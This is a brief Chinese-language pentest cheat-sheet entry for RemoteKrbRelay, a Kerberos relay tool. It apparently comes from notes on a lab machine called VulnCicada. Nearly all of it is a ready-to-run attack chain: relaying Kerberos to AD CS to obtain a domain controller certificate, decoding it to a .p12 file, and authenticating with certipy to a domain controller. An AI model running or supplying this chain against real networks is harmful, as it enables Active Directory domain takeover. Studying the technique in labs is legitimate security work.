RemoteKrbRelay

https://github.com/CICADA8-Research/RemoteKrbRelay
一个Kerberos relay的利用工具 类似于krbrelayx

1. 利用

#kerberos中继获取域控证书
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
#将base64格式的证书转换为文件
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
#使用证书进行认证
certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl

2. 案例

VulnCicada > 1.4.2.2. Kerberos Relay via RemoteKrbRelay